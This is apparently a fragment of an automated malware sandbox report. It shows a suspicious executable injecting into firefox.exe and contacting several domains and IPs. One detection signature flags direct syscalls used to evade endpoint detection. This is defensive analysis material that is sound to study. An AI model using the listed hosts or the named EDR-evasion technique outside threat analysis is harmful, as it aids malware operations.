Ll3N65UXbvloyqJVc8Qu.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 intention.digital 46.38.243.234, 49710, 49711, 49712 NETCUP-ASnetcupGmbHDE Germany 23->37 39 www.kdjsswzx.club 188.114.96.3, 49709, 80 CLOUDFLARENETUS European Union 23->39 41 www.meacci.xyz 13.248.169.48, 49714, 49715, 49716 AMAZON-02US United States 23->41 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 signatures15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.